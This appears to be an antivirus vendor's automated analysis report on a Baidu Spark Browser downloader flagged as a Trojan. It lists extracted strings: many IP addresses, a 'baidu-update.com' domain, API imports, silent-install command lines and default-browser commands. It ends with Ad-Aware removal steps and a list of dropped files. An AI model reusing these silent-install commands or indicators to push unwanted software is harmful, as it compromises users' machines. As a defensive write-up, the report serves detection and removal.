eeip8833h7z3hm48l4y59beoenvp6lm8aslgr26d9pm8ofept1rymcyt016u1os0by0npbnm0l8cvxgi4zor60y87nctovlm78q2ahdlyinew4ivknj2w35drkux-l5jerpnqdm89tl7zh59a5bcpsbi6wn009rjjy49xtg2uo1knhi4-fk2xd7jv1jdzxzf4u4rxo0g6cblx5gxhvk7s47kz9wq84bcfvf94nmcrp2wsp9ex0wjmi0ni32kwbiq20-jmglragjm707aq619fdzce7oa3spv2h5f2zfybvw8uzmfa-3l2pvcj5gtorp44h4w0lyow3u6duamlrq7fauclv8urbkats89zkg6tpesgsycp5vfa2ho5ij7nywq6kyt0al8cpmcyhw8durpddbs5cujfx91rro-7nd7-ypt-g728fcytuxi7ohlr3mc7hblhkudazai2op128oj4m77mjo01o6jo7vonq7m84-82aqdvvcx29f-4wa09fslvfe898lecthbcynv8kdmvgf00smaeb9h1zxunahm8jxze6tnrafv67oo01c5ufwo8uqq8yg4qxo6zjjzosa2u1vhkdgmrc1zikaa48ekd62yl9peklseg1kvj6dddxylbroziy-6irnze077ci1wbhioqe6m3-5uwgbihlx6ib-outxl6x5vdqzdd-hmfrvqu26cq4cg0vk6kydoz-v69f57nwjcppg9u73k276yc0p3f8vuw9sz-9jm0y6wljh-pyhe7s7-s5v2h20jps57ekaxnfs8cca0t9bvqfozszreyhakkkm6wdejqla1z9u0vhkqodqj42s9kgpgugg2kndyr3bpwl9lacgdbhtem-ywu63jhsvfiuswubuzg78b02m167o8d3z-yvpjg1sej52pyt7vao3at6--67iogvwxz84p6dtyywr023r-rpxhhcwjsbfzy90bgyoxwohl4r74-c740si6iabn4t3ng2oh0p2gtuqy0zf3601r7nor4g3ulmtr37m1evc3g7jaxdmny0qj-33z6maxw99itloldlai74uzr6hv3fqapxt8et7nvmgom131zlm5j91964woqrbsuu9lfw9-ipyyzfn0qwuk329r73r4jdvjgtgjjmh0xq1mt93x0vlz6fz04i8dyn25620uki942nu89f35zsj6bhcvltz8kczwzxyhxkcft790-fcqa9c24or0qcavf6uvvju5rku4fs9qv8r84cjv293ij--gqiyxaypaeyx66hghn75b1rupdg25v-g-fx26hbvljpcl97h2ucby3efeq6mra58t0f1iot9lc73g6jgcdv2ghy80vdaoolh3hchjyxvz67yoymw0tpu3snu8vvgptm-lall4uxh--sgln1u4aolw8v3npe12z3thbdzxjls6x7i5pitw6kjsqd9dv-8givanlazfeu3gc69uotqqmjp7yvirj52mk98nrgsp479ncp4o1-hqwr06wxupy9jf3b9jlts5jar4u54xraxe-xy0s78wd3ec1abwogaq36o7atcuv-mxjy5qycrom5v55lo9mo6okuzzlo0edyjeskunlw1vgbr1m5bjw-681mjqtiu180qp4ryqwsf1-yp171ag4rkylug2bn0-91dwksoall1ndztldn1esdk3dsmnt72pogdfv8ixxtjev56pf2gu0wbho-gjgo9otpy--nnxjvmt-4i-koa21qjmjg-6684srg3hjy7nlmn7c1rxrd8-u77gq0hrviabg0m0y5ozsmwns4r5kpxbqxh6xcg4q13-ezrd07u8tnguykzpoqpjrtf83uka2o7iu2sy-rlgq48k4uhfn8fz41gxh8i0an6yxm5hxrcdagfcf5tp1hrhvgy5oe031ycq3212y4m6iyrnpkdod8a84w7gcvo3-q9zflb404prx2p8x8bynqy2byvp7j6oao-ajb889dzul12flajprsflw56pfhbsu4oa3rrpi42hzpvjpnj-w99rwwnii-gre2bhva8avoy694-xp3-5n6fhwqt2vncq40r0a9cj9jlt3olg2niclflesdpps9dmep9tzi4c-fozz1ss9lezp9bbi24gnuo0xt0ltvm8zb8xn346yx9tsx4i7vb787whvz6s1-60pm282ueuhfmpvshoiqflgx0enk6t7r36wix17d94hjkr1cqk9ee9lpazwep12hf5kleh9cbk18ogcx7472s-onw8z6xf6eokx3dkg0vs7lzhkbilljke18mrwdtd9lqjwbxia3x9fu6mdpah9a6uk8x-bac153a4lqo49v57topd7q7i8w0ecmboxiupbksdhsqoiurz2u-mv9p6u6vh-c7begfosozutlggkzx2hsaugdnli04uoy60j3hhuhf2hgjvfbw-43lx0boczhcq6n462rndt6nkecr901fu7a5g9y-vhz8wt-zwzj3f4g7ct65gy88824pzh3uwfd0pdwbkm5fhpde92korbmrq55cnuxl38rjgbmo5fxwmw83kgzejh7wot0ksahg74vpj9x7b1ddpipw9uvaqn8y-ynwpjox7zygbmm-vtbmytblhcl76ckq4m9ofbnjcx6wtdkp4m1lje2sj3a-l9wvm6nds3bqarqdd71wa8r1dtr7q4v3nwtwg5dbo1j04n39hwknzf35oabng-ufn7ho69l-ecggyvnikg56hrzu-k452pra6vabrtcaqr19queu2ibaw892uolcee-v-dnbildlt46bpepuaabd

61.50.161.8

61.50.131.114

61.49.28.2

61.49.18.189

61.49.0.99

61.236.159.99

61.235.70.98

61.234.254.6

61.234.254.5

61.233.65.3

61.232.206.102

61.232.206.100

61.182.207.135

61.181.14.148

61.177.7.1

61.167.83.76

61.167.83.66

61.166.150.123

61.163.252.74

61.163.252.70

61.163.252.62

61.163.252.6

61.163.252.58

61.163.252.50

61.163.252.46

61.163.252.42

61.163.252.30

61.163.252.26

61.163.252.22

61.163.252.2

61.163.252.14

61.153.177.199

61.153.177.198

61.148.47.60

61.148.115.186

61.147.37.1

61.144.56.101

61.144.56.100

61.139.2.69

61.138.14.100

61.138.129.157

61.138.129.156

61.138.129.155

61.135.255.144

61.135.23.91

61.135.23.90

61.135.23.75

61.135.23.74

61.135.23.59

61.135.23.58

61.135.23.43

61.135.23.42

61.135.23.27

61.135.23.26

61.135.23.107

61.135.23.106

61.135.166.53

61.135.166.115

61.135.163.37

61.135.163.36

61.135.160.135

61.135.159.47

61.135.159.46

61.135.154.50

61.135.154.5

61.135.148.69

61.135.131.1

61.133.99.110

61.128.97.74

61.128.97.73

61.128.192.4

61.128.128.68

60.8.44.9

60.8.44.13

60.6.40.225

60.6.40.221

60.29.57.172

60.28.251.1

60.28.250.46

60.28.246.118

60.28.208.200

60.28.196.127

60.28.196.126

60.28.196.125

60.28.196.124

60.28.194.208

60.28.186.234

60.28.186.232

60.28.186.231

60.28.162.254

60.219.1.46

60.219.1.36

60.218.122.68

60.217.198.130

60.215.138.70

60.215.138.66

60.215.138.62

60.215.138.58

60.215.138.54

60.215.138.50

60.215.138.46

60.215.138.42

60.215.138.38

60.215.138.34

60.215.138.30

60.215.138.26

60.215.138.22

60.215.138.18

60.215.138.14

60.215.138.10

60.210.107.130

60.210.100.54

60.21.140.230

60.2.152.70

60.2.152.66

60.2.145.157

60.2.145.153

60.2.145.149

60.2.145.145

60.2.145.141

60.2.145.137

60.2.145.133

60.2.145.129

60.19.18.118

60.15.127.2

60.15.127.10

60.12.6.10

60.12.166.166

60.11.254.156

60.11.254.146

60.11.141.170

60.11.141.166

60.11.111.76

60.11.111.66

60.10.134.197

60.10.134.193

59.51.78.211

59.51.78.210

58.253.84.193

58.251.57.26

58.251.57.22

58.251.17.34

58.248.189.139

58.248.14.88

58.246.47.229

58.246.137.99

58.242.2.2

58.241.84.6

58.241.84.5

58.241.208.46

58.241.190.50

58.240.47.242

58.23.9.228

58.23.67.88

58.23.0.70

58.22.135.133

58.22.101.50

58.22.101.42

58.22.101.38

58.22.101.34

58.20.221.214

58.20.127.238

58.20.127.170

58.17.60.85

222.88.88.88

222.85.85.85

222.45.1.40

222.246.129.81

222.246.129.80

222.172.200.68

222.135.92.70

222.135.110.197

222.134.86.118

222.134.85.98

222.134.85.122

222.134.77.86

222.134.145.110

222.134.133.222

222.132.102.65

222.132.102.61

221.7.92.98

221.7.40.200

221.7.36.75

221.7.34.11

221.7.34.10

221.7.197.13

221.7.138.26

221.7.138.22

221.7.138.18

221.7.136.68

221.7.128.68

221.7.1.21

221.7.1.20

221.6.96.178

221.6.96.177

221.6.4.67

221.6.4.66

221.6.246.1

221.6.231.1

221.6.176.150

221.6.151.1

221.5.88.88

221.5.88.78

221.5.88.70

221.5.88.66

221.5.203.98

221.4.8.1

221.4.232.200

221.4.181.28

221.4.153.71

221.3.211.165

221.3.208.136

221.3.154.61

221.3.131.9

221.3.131.21

221.3.131.20

221.3.131.19

221.3.131.18

221.3.131.16

221.3.131.10

221.214.7.250

221.213.71.181

221.211.8.206

221.211.8.196

221.210.200.114

221.210.200.106

221.210.153.9

221.210.153.6

221.208.241.229

221.207.58.68

221.207.58.58

221.202.189.57

221.2.227.234

221.2.211.14

221.199.12.158

221.194.33.49

221.194.33.45

221.192.236.90

221.136.69.1

221.13.65.34

221.13.30.242

221.13.28.234

221.12.66.194

221.12.65.228

221.12.65.227

221.12.33.228

221.12.33.227

221.12.31.59

221.12.31.58

221.12.1.228

221.12.1.227

221.11.132.3

221.11.132.2

221.11.1.90

221.11.1.89

221.11.1.88

221.11.1.87

221.11.1.86

221.11.1.85

221.10.66.133

221.10.50.246

221.10.37.250

221.10.254.231

221.10.251.52

221.10.251.197

221.10.25.210

221.10.25.206

221.10.25.202

221.10.230.21

221.10.230.20

221.10.112.5

220.249.251.13

220.248.17.89

220.248.111.29

220.248.111.118

220.170.64.96

219.72.225.254

219.72.225.253

219.232.243.37

219.232.241.253

219.157.27.238

219.150.32.132

219.150.150.150

219.148.162.31

219.146.0.132

219.146.0.130

218.85.157.99

218.8.128.98

218.8.128.106

218.76.248.6

218.76.248.100

218.76.192.101

218.76.192.100

218.7.80.2

218.7.80.10

218.7.7.2

218.7.7.18

218.7.7.14

218.7.7.10

218.7.250.2

218.7.250.10

218.7.150.2

218.7.150.1

218.69.116.39

218.62.2.228

218.58.60.131

218.58.126.122

218.58.123.254

218.58.123.106

218.58.118.174

218.58.118.114

218.58.104.90

218.58.104.106

218.57.221.242

218.57.200.3

218.57.129.186

218.57.10.212

218.56.57.15

218.56.57.14

218.56.41.41

218.56.33.53

218.56.33.49

218.56.111.150

218.56.105.58

218.28.99.214

218.28.199.235

218.28.112.68

218.26.12.61

218.25.87.244

218.25.179.5

218.25.132.32

218.25.103.243

218.24.180.251

218.2.135.1

218.12.199.209

218.12.199.205

218.11.142.5

218.11.142.1

218.108.250.222

218.108.249.118

218.108.248.230

218.108.248.200

218.108.245.157

218.108.244.227

218.108.244.226

218.108.244.140

218.108.244.135

218.108.244.133

218.108.244.132

218.108.17.226

218.106.253.41

218.106.152.69

218.106.152.34

218.104.95.230

218.104.82.229

218.104.78.2

218.104.48.106

218.104.47.66

218.104.32.106

218.104.241.238

218.104.207.140

218.104.136.149

218.104.128.74

218.104.128.70

218.104.111.122

218.104.111.114

211.98.72.8

211.98.72.7

211.98.4.1

211.98.2.4

211.98.192.3

211.158.6.162

211.158.6.161

211.158.2.69

211.151.57.73

211.151.57.71

211.151.57.70

211.151.50.200

211.151.230.139

210.83.64.18

210.83.228.3

210.83.223.98

210.83.223.114

210.83.214.162

210.83.210.155

210.83.208.73

210.83.207.247

210.82.36.221

210.82.112.2

210.82.111.140

210.53.31.2

210.52.207.2

210.52.149.2

210.51.192.162

210.51.18.182

210.51.176.71

210.51.170.71

210.51.16.52

210.22.84.3

210.22.70.3

210.22.70.227

210.22.253.201

210.22.135.12

210.21.71.34

210.21.230.58

210.21.201.189

210.21.2.38

210.21.2.30

210.21.196.6

210.21.196.5

210.21.119.156

210.21.1.38

210.21.1.30

210.13.98.251

210.13.83.133

210.13.193.186

208.151.69.65

205.252.144.228

203.93.208.26

202.99.96.68

202.99.69.6

202.99.69.50

202.99.69.46

202.99.69.42

202.99.69.38

202.99.69.34

202.99.69.2

202.99.69.14

202.99.69.10

202.99.65.60

202.99.6.10

202.99.47.68

202.99.33.1

202.99.227.77

202.99.227.76

202.99.227.75

202.99.227.74

202.99.227.73

202.99.227.72

202.99.227.71

202.99.227.68

202.99.227.67

202.99.224.68

202.99.219.11

202.99.198.6

202.99.198.102

202.99.192.68

202.99.176.30

202.99.171.37

202.99.171.33

202.99.168.8

202.99.166.4

202.99.160.68

202.99.16.7

202.98.96.69

202.98.96.68

202.98.5.68

202.98.198.167

202.98.192.68

202.98.192.67

202.98.160.68

202.98.14.19

202.98.14.18

202.98.1.11

202.98.0.82

202.98.0.68

202.97.229.133

202.97.227.138

202.97.224.69

202.97.224.68

202.97.194.129

202.97.16.195

202.96.96.68

202.96.86.24

202.96.86.18

202.96.75.78

202.96.75.68

202.96.75.64

202.96.69.38

202.96.64.68

202.96.57.137

202.96.57.109

202.96.27.253

202.96.209.5

202.96.209.133

202.96.199.133

202.96.199.132

202.96.154.8

202.96.154.15

202.96.144.47

202.96.134.133

202.96.128.86

202.96.128.68

202.96.128.166

202.96.128.143

202.96.128.110

202.96.104.25

202.96.104.18

202.96.104.15

202.96.102.3

202.96.0.133

202.175.3.8

202.175.3.3

202.111.154.36

202.110.48.10

202.110.203.15

202.110.201.4

202.110.193.12

202.110.190.6

202.110.122.170

202.110.106.212

202.109.226.68

202.109.129.2

202.108.87.66

202.108.65.4

202.108.65.2

202.108.63.253

202.108.255.247

202.108.255.202

202.108.254.4

202.108.253.61

202.108.199.19

202.108.170.226

202.108.145.36

202.108.137.60

202.108.124.13

202.108.124.10

202.107.82.65

202.106.80.131

202.106.235.57

202.106.196.236

202.106.196.232

202.106.196.230

202.106.196.212

202.106.195.84

202.106.182.153

202.106.148.1

202.106.141.34

202.106.132.135

202.106.127.122

202.106.127.1

202.106.120.1

202.106.116.8

202.106.116.6

202.106.116.5

202.106.110.4

202.106.106.132

202.106.0.20

202.103.96.68

202.103.96.112

202.103.44.150

202.103.24.68

202.103.225.68

202.103.224.68

202.103.0.68

202.103.0.117

202.102.3.141

202.102.29.3

202.102.245.12

202.102.24.35

202.102.227.90

202.102.227.86

202.102.227.82

202.102.227.78

202.102.227.74

202.102.227.68

202.102.224.90

202.102.224.86

202.102.224.82

202.102.224.78

202.102.224.74

202.102.224.68

202.102.199.68

202.102.192.68

202.102.164.189

202.102.155.126

202.102.154.3

202.102.152.3

202.102.15.162

202.102.137.68

202.102.136.11

202.102.134.68

202.102.128.68

202.101.98.55

202.101.98.54

202.101.240.36

202.101.226.68

202.101.224.69

202.101.224.68

202.101.172.47

202.101.172.35

202.101.113.55

202.101.112.55

202.101.107.98

202.101.107.85

202.101.107.55

202.101.103.55

202.101.103.54

202.100.96.68

202.100.72.13

202.100.4.16

202.100.4.15

202.100.199.8

202.100.192.68

202.100.13.11

202.100.128.68

202.100.0.68

125.46.61.12

125.35.2.150

125.35.11.32

125.210.35.3

125.210.35.2

124.89.76.214

124.89.12.94

124.65.164.30

124.166.247.5

124.161.97.242

124.161.97.238

124.161.97.234

124.133.254.61

124.129.172.40

124.128.217.34

123.157.146.129

123.15.5.135

123.129.192.9

123.129.192.69

123.129.192.65

123.129.192.61

123.129.192.57

123.129.192.53

123.129.192.49

123.129.192.45

123.129.192.41

123.129.192.37

123.129.192.33

123.129.192.29

123.129.192.25

123.129.192.21

123.129.192.17

123.129.192.13

123.127.171.139

123.127.143.5

123.125.66.98

123.125.66.97

123.125.66.95

123.125.66.92

123.125.66.86

123.125.66.82

123.125.66.45

123.125.64.19

123.125.64.18

123.124.249.192

123.124.198.58

123.124.156.148

123.118.194.80

123.115.189.6

122.96.60.130

122.192.80.34

122.192.80.30

122.159.51.5

122.156.237.18

121.31.60.90

121.31.60.86

121.31.60.82

121.31.60.74

121.31.60.70

121.31.60.66

121.29.237.220

121.28.7.9

121.28.7.5

121.28.7.33

121.28.7.29

121.28.7.25

121.28.7.21

121.28.7.17

121.28.7.13

121.26.200.47

121.22.48.2

121.17.127.253

121.17.127.249

119.6.32.137

119.167.225.136

116.113.84.6

116.113.84.22

116.113.84.2

116.113.84.18

116.113.84.14

116.113.84.10

116.112.62.254

10.89.64.5

10.29.0.2

10.184.0.1

10.179.64.1

10.17.128.90

10.157.2.15

10.150.0.1

10.117.32.40

10.10.64.68

180.149.132.168

180.149.132.166

123.125.65.90

123.125.65.88

180.76.2.183

180.76.3.151

58.217.200.15

58.217.200.13

115.239.210.28

115.239.210.25

115.239.210.27

115.239.210.26

123.125.65.82

123.125.65.78

61.135.185.32

61.135.185.31

61.135.169.125

61.135.169.121

61.135.169.105

61.135.169.103

220.181.112.147

220.181.111.149

202.108.22.5

202.108.22.142

123.125.115.140

123.125.114.220

123.125.114.107

180.149.132.151

180.149.131.98

220.181.6.6

220.181.6.19

220.181.6.18

220.181.6.175

220.181.37.55

220.181.112.76

220.181.112.244

220.181.112.143

220.181.111.83

220.181.111.188

220.181.111.148

220.181.111.147

220.181.111.111

123.125.115.165

123.125.114.238

119.75.218.77

119.75.218.70

119.75.218.45

119.75.218.143

119.75.218.11

119.75.217.63

119.75.217.56

119.75.217.26

119.75.217.109

119.75.216.20

119.75.213.61

119.75.213.51

119.75.213.50

192.168.255.255

192.168.0.0

172.31.255.255

172.16.0.0

10.255.255.255

10.0.0.0

baidu-update.com

VVV.baidu.com

GetProcessWindowStation

operator

portuguese-brazilian

F:\nsis2\src\build\urelease\stub_lzma\stub_lzma.pdb

.?AV?$CObjectVector@VCKeyInfo@NSevenZ@NCrypto@@@@

.?AUICryptoSetPassword@@

.?AUICryptoGetTextPassword@@

zcÁ

GetProcessHeap

GetWindowsDirectoryW

KERNEL32.dll

ExitWindowsEx

GetAsyncKeyState

USER32.dll

GDI32.dll

SHFileOperationW

ShellExecuteW

SHELL32.dll

RegDeleteKeyW

RegCloseKey

RegEnumKeyW

RegOpenKeyExW

RegCreateKeyExW

ADVAPI32.dll

COMCTL32.dll

ole32.dll

VERSION.dll

OLEAUT32.dll

DNSAPI.dll

WS2_32.dll

IPHLPAPI.DLL

GetCPInfo

RUDpUEU

.LZ^87

h%XkCzo

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46.5-Unicode</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

logging set to %d

settings logging to %d

created uninstaller: %d, "%s"

WriteReg: error creating key "%s\%s"

WriteReg: error writing into "%s\%s" "%s"

WriteRegBin: "%s\%s" "%s"="%s"

WriteRegDWORD: "%s\%s" "%s"="0xx"

WriteRegExpandStr: "%s\%s" "%s"="%s"

WriteRegStr: "%s\%s" "%s"="%s"

DeleteRegKey: "%s\%s"

DeleteRegValue: "%s\%s" "%s"

WriteINIStr: wrote [%s] %s=%s in %s

CopyFiles "%s"->"%s"

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d

Error registering DLL: Could not load %s

Error registering DLL: %s not found in %s

GetTTFFontName(%s) returned %s

GetTTFVersionString(%s) returned %s

Exec: failed createprocess ("%s")

Exec: success ("%s")

Exec: command="%s"

ExecShell: success ("%s": file:"%s" params:"%s")

ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d

Exch: stack < %d elements

RMDir: "%s"

MessageBox: %d,"%s"

Delete: "%s"

File: wrote %d to "%s"

File: skipped: "%s" (overwriteflag=%d)

File: error creating "%s"

File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"

Rename failed: %s

Rename on reboot: %s

Rename: %s

IfFileExists: file "%s" does not exist, jumping %d

IfFileExists: file "%s" exists, jumping %d

CreateDirectory: "%s" created

CreateDirectory: can't create "%s" - a file already exists

CreateDirectory: can't create "%s" (err=%d)

CreateDirectory: "%s" (%d)

SetFileAttributes: "%s":X

Sleep(%d)

detailprint: %s

Call: %d

Aborting: "%s"

Jump: %d

verifying installer: %d%%

... %d%%

hXXp://nsis.sf.net/NSIS_Error

ntdll.dll

ppid=%d

~nsu.tmp

BdNsProgressUnInitTimer():PID-%u:TID-%u:: Params is invalid

BdNsProgressUnInitTimer():PID-%u:TID-%u:: BdNsProgressUnInitTimer

BdNsProgressGetExMBSLeftTime():PID-%u:TID-%u::ExtractMB2Info:%u:%u,CompletedSize:%u,TotalSize:%u,Left:%u,Total:%u

BdNsProgressGetExMBSLeftTime():PID-%u:TID-%u::ExtractMBInfo :%u:%u,CompletedSize:%u,TotalSize:%u:Left:%u,Total:%u

install.log

%u.%u%s%s

Skipping section: "%s"

Section: "%s"

New install of "%s" to "%s"

BdNsProgressTimerCB():PID-%u:TID-%u::FinalMode::CurPos:%u:FinalPos:%u:CurElpase:%u:FinalElpase:%u

BdNsProgressTimerCB():PID-%u:TID-%u::NormalMode::CurPos:%u:FinalPos:%u:CurElpase:%u:FinalElpase:%u:IO:%I64u:%I64u

BdNsProgressInitTimer():PID-%u:TID-%u:: BdNsProgressInitTimer

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

%u:%u

*?|<>/":

invalid registry key

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

HKEY_PERFORMANCE_DATA

HKEY_USERS

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

HKEY_CLASSES_ROOT

x%c

BdNsAddPerfId():PID-%u:TID-%u::Custom:%s

BdNsAddPerfId():PID-%u:TID-%u::Fix:%s

BdNsReadPerfInfo():PID-%u:TID-%u::Custom:%s

BdNsReadPerfInfo():PID-%u:TID-%u::Fix:%s

BdNsGetElapseFromPerfId():PID-%u:TID-%u::Custom:%s

BdNsGetElapseFromPerfId():PID-%u:TID-%u::Fix:%s

RMDir: RemoveDirectory failed("%s")

RMDir: RemoveDirectory on Reboot("%s")

RMDir: RemoveDirectory("%s")

RMDir: RemoveDirectory invalid input("%s")

Delete: DeleteFile failed("%s")

Delete: DeleteFile on Reboot("%s")

Delete: DeleteFile("%s")

%s: failed opening file "%s"

DNSAPI.DLL

EKERNEL32.DLL

mscoree.dll

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

ADVAPI32.DLL

WUSER32.DLL

"%Program Files%\baidu\Spark\\Spark.exe " --type=make_default_browser_for_magnet

aidu Spark Browser.lnk

.57&From=EG_MENAON-Mini_32_3313&OneKeyEvent=FileReady"

EATURE_SCRIPTURL_MITIGATION

owser.lnk

Browser.lnk

tion\image\BaiduBrowser.ico"

nstall.exe" /S /Channel=EG_MENAON-Mini_32_3313 /Lang=en-US

ALS~1\Temp\nsuB8.tmp\CloseRun2.dll

e\baidubrowser.ico

%Program Files%\baidu\Spark

Baidu Spark Browser.lnk

%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Baidu Spark Browser.lnk

%Documents and Settings%\%current user%\Local Settings\Application Data\temp\spark_install.exe

Exec: success (""%Program Files%\baidu\Spark\\Spark.exe " --type=make_default_browser_for_magnet")

idu.com"

ark\resource\application\image\BaiduBrowser.ico""

on: %Program Files%\baidu\Spark\resource\application\Image\baidubrowser.ico,0, sw=0, hk=0

ngs\"%CurrentUserName%"\Local Settings\Application Data\temp\spark_install.exe" /S /Channel=EG_MENAON-Mini_32_3313 /Lang=en-US

nstallType=-E&Version=33.9.1000.57&From=EG_MENAON-Mini_32_3313&OneKeyEvent=FileReady

"%Documents and Settings%\%current user%\Local Settings\Application Data\temp\spark_install.exe" /S /Channel=EG_MENAON-Mini_32_3313 /Lang=en-US

%Documents and Settings%\%current user%\Local Settings\Application Data\temp

spark_install.exe

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB7.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsuB8.tmp

%Program Files%\baidu\Spark\extensions

112660000

All_Official_33.9.1000.57

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\sparksetup\DefaultConfig.xml

%Documents and Settings%\%current user%\Application Data\Baidu\Spark\SysData\ExtApp\update

83951616

-2063532032

-2147284440

33.9.1000.57

SparkSetup.exe

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   Google.exe:2196
   vcredistx64.exe:3620
   %original file name%.exe:2736
   Index.exe:3872

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   %Documents and Settings%\%current user%\Local Settings\Temp\21.6214035581797\bdMiniDownloaderEG_MENAON-Mini_32_3313.exe (129048 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\bdMiniDownloaderEG_MENAON-Mini_32_3313[1].exe (488329 bytes)
   %Documents and Settings%\%current user%\Cookies\SCIB46R7.txt (115 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\21.6214035581797\8.50130400527269.txt (406 bytes)
   C:\29bb03690662e5ba2efc\1028\LocalizedData.xml (753 bytes)
   C:\29bb03690662e5ba2efc\sqmapi.dll (2385 bytes)
   C:\29bb03690662e5ba2efc\Graphics\SysReqNotMet.ico (1 bytes)
   C:\29bb03690662e5ba2efc\1049\SetupResources.dll (17 bytes)
   C:\29bb03690662e5ba2efc\3082\SetupResources.dll (18 bytes)
   C:\29bb03690662e5ba2efc\1041\LocalizedData.xml (885 bytes)
   C:\29bb03690662e5ba2efc\Graphics\Rotate4.ico (894 bytes)
   C:\29bb03690662e5ba2efc\1041\SetupResources.dll (15 bytes)
   C:\29bb03690662e5ba2efc\Strings.xml (14 bytes)
   C:\29bb03690662e5ba2efc\1036\LocalizedData.xml (512 bytes)
   C:\29bb03690662e5ba2efc\1040\SetupResources.dll (776 bytes)
   C:\29bb03690662e5ba2efc\Graphics\Save.ico (1150 bytes)
   C:\29bb03690662e5ba2efc\1036\eula.rtf (8 bytes)
   C:\29bb03690662e5ba2efc\2052\LocalizedData.xml (403 bytes)
   C:\29bb03690662e5ba2efc\1028\SetupResources.dll (13 bytes)
   C:\29bb03690662e5ba2efc\Graphics\Rotate5.ico (894 bytes)
   C:\29bb03690662e5ba2efc\vc_red.msi (2454 bytes)
   C:\29bb03690662e5ba2efc\DisplayIcon.ico (1877 bytes)
   C:\29bb03690662e5ba2efc\SetupUi.dll (4564 bytes)
   C:\29bb03690662e5ba2efc\1042\eula.rtf (1061 bytes)
   C:\29bb03690662e5ba2efc\1040\LocalizedData.xml (807 bytes)
   C:\29bb03690662e5ba2efc\DHtmlHeader.html (16 bytes)
   C:\29bb03690662e5ba2efc\Graphics\Print.ico (1 bytes)
   C:\29bb03690662e5ba2efc\1042\SetupResources.dll (14 bytes)
   C:\29bb03690662e5ba2efc\1036\SetupResources.dll (993 bytes)
   C:\29bb03690662e5ba2efc\vc_red.cab (72837 bytes)
   C:\29bb03690662e5ba2efc\header.bmp (7 bytes)
   C:\29bb03690662e5ba2efc\UiInfo.xml (1675 bytes)
   C:\29bb03690662e5ba2efc\3082\eula.rtf (842 bytes)
   C:\29bb03690662e5ba2efc\3082\LocalizedData.xml (994 bytes)
   C:\29bb03690662e5ba2efc\SetupEngine.dll (12353 bytes)
   C:\29bb03690662e5ba2efc\Graphics\Rotate6.ico (894 bytes)
   C:\29bb03690662e5ba2efc\Graphics\Rotate1.ico (894 bytes)
   C:\29bb03690662e5ba2efc\1042\LocalizedData.xml (341 bytes)
   C:\29bb03690662e5ba2efc\1049\LocalizedData.xml (592 bytes)
   C:\29bb03690662e5ba2efc\Graphics\Rotate3.ico (894 bytes)
   C:\29bb03690662e5ba2efc\Graphics\SysReqMet.ico (1 bytes)
   C:\29bb03690662e5ba2efc\1049\eula.rtf (924 bytes)
   C:\29bb03690662e5ba2efc\watermark.bmp (6023 bytes)
   C:\29bb03690662e5ba2efc\SplashScreen.bmp (1049 bytes)
   C:\29bb03690662e5ba2efc\$shtdwn$.req (788 bytes)
   C:\29bb03690662e5ba2efc\1031\eula.rtf (789 bytes)
   C:\29bb03690662e5ba2efc\Graphics\Rotate7.ico (894 bytes)
   C:\29bb03690662e5ba2efc\1033\LocalizedData.xml (1023 bytes)
   C:\29bb03690662e5ba2efc\1028\eula.rtf (16 bytes)
   C:\29bb03690662e5ba2efc\Graphics\Setup.ico (182 bytes)
   C:\29bb03690662e5ba2efc\1041\eula.rtf (358 bytes)
   C:\29bb03690662e5ba2efc\1031\LocalizedData.xml (658 bytes)
   C:\29bb03690662e5ba2efc\2052\eula.rtf (16 bytes)
   C:\29bb03690662e5ba2efc\Graphics\warn.ico (10 bytes)
   C:\29bb03690662e5ba2efc\2052\SetupResources.dll (272 bytes)
   C:\29bb03690662e5ba2efc\1033\SetupResources.dll (16 bytes)
   C:\29bb03690662e5ba2efc\Graphics\Rotate8.ico (894 bytes)
   C:\29bb03690662e5ba2efc\1031\SetupResources.dll (140 bytes)
   C:\29bb03690662e5ba2efc\Graphics\stop.ico (10 bytes)
   C:\29bb03690662e5ba2efc\1033\eula.rtf (7 bytes)
   C:\29bb03690662e5ba2efc\Setup.exe (932 bytes)
   C:\29bb03690662e5ba2efc\1040\eula.rtf (9 bytes)
   C:\29bb03690662e5ba2efc\ParameterInfo.xml (654 bytes)
   C:\29bb03690662e5ba2efc\SetupUi.xsd (556 bytes)
   C:\29bb03690662e5ba2efc\Graphics\Rotate2.ico (894 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\Microsoft Visual C 2010 x64 Redistributable Setup_20141027_025649617.html (54118 bytes)
